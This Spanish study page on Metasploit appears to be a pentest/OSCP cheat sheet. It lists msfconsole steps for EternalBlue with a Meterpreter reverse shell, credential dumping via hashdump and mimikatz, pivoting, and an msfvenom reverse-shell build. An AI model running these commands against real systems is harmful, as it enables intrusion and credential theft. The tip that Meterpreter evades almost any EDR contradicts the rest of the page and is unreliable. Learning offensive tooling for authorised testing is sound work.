Metasploit
Metasploit Framework es la plataforma de explotación más conocida: un arsenal de exploits, payloads y módulos auxiliares con una interfaz común. Acelera la explotación y la post-explotación, aunque en entornos como el OSCP conviene saber hacerlo también “a mano” (ver área Pwn/Reversing y Windows & AD).
Conceptos
Sección titulada «Conceptos»Exploit código que aprovecha una vuln para ejecutar un payloadPayload lo que se ejecuta tras explotar (shell, Meterpreter, comando)Auxiliary módulos que no explotan: escáneres, fuzzers, enumeración, DoSEncoder ofuscar payloads (hoy poco eficaz contra EDR, ver mal-evasion)Post módulos de post-explotación (recolección, pivoting, persistencia)Meterpreter payload avanzado en memoria con muchas capacidadesFlujo básico (msfconsole)
Sección titulada «Flujo básico (msfconsole)»msfconsolesearch <servicio/CVE> # buscar módulosuse exploit/windows/smb/ms17_010_eternalblueshow options # ver parámetros requeridosset RHOSTS 10.10.10.10 ; set LHOST <tu_ip>set PAYLOAD windows/x64/meterpreter/reverse_tcprun (o exploit) # lanzarMeterpreter (post-explotación)
Sección titulada «Meterpreter (post-explotación)»sysinfo ; getuid # info del sistema y usuariohashdump # volcar hashes (ver ad-creds)migrate <pid> # migrar a otro procesoportfwd / route # pivoting a redes internas (ver ad-lateral)background / sessions # gestionar sesionesload kiwi # mimikatz integradoMódulos auxiliares y msfvenom
Sección titulada «Módulos auxiliares y msfvenom»auxiliary/scanner/... # escaneo/enumeración (smb, ssh, http...)msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=.. LPORT=.. -f exe > s.exe # generar payloads standalone (ojo: muy detectados por AV/EDR, ver mal-evasion)handler (exploit/multi/handler) # recibir conexiones de payloadsCuándo (y cuándo no) usarlo
Sección titulada «Cuándo (y cuándo no) usarlo»- rápido y potente para exploits conocidos y post-explotación/pivoting- en OSCP: uso LIMITADO en el examen -> aprende a explotar y pivotar también a mano- payloads de msfvenom "a pelo" son muy detectables (evasión: ver mal-evasion)- en CTF a veces "a mano" es más fiable y didáctico que un móduloBlue Team / uso
Sección titulada «Blue Team / uso»- Metasploit acelera explotación y post-explotación (Meterpreter, pivoting) con interfaz común.
- Saber hacerlo a mano también es clave (OSCP lo limita; CTF a veces lo prefiere así).
- Los payloads de msfvenom son muy detectables: para evasión real, ver mal-evasion.
- Para el defensor: las firmas de Meterpreter/msfvenom son IOCs conocidos (EDR / XDR, dfir).
Trucos y errores comunes
Sección titulada «Trucos y errores comunes»db_nmap+ workspaces mantienen todo ordenado; usasetgpara variables globales (LHOST, etc.).- Error típico: olvidar
set PAYLOAD/set LHOSTo usar un payload ya detectado; Meterpreter salta casi cualquier EDR. - En pentest real úsalo con cautela por su detectabilidad; para red team maduro, C2 dedicado (ver Command & Control).
sessions -upara upgradear a Meterpreter;migratea un proceso estable; scriptsresourcepara automatizar.
Checklist de prueba
Sección titulada «Checklist de prueba»- Identificar el exploit/módulo adecuado (search)
- Configurar options (RHOSTS/LHOST/PAYLOAD) correctamente
- Handler listo para recibir la sesión
- Post-explotación con Meterpreter (hashdump, migrate, pivoting)
- Valorar hacerlo a mano (OSCP/CTF) y la detectabilidad
- msfvenom solo con conciencia de evasión (Evasión de defensas)
- Documentar para el reporte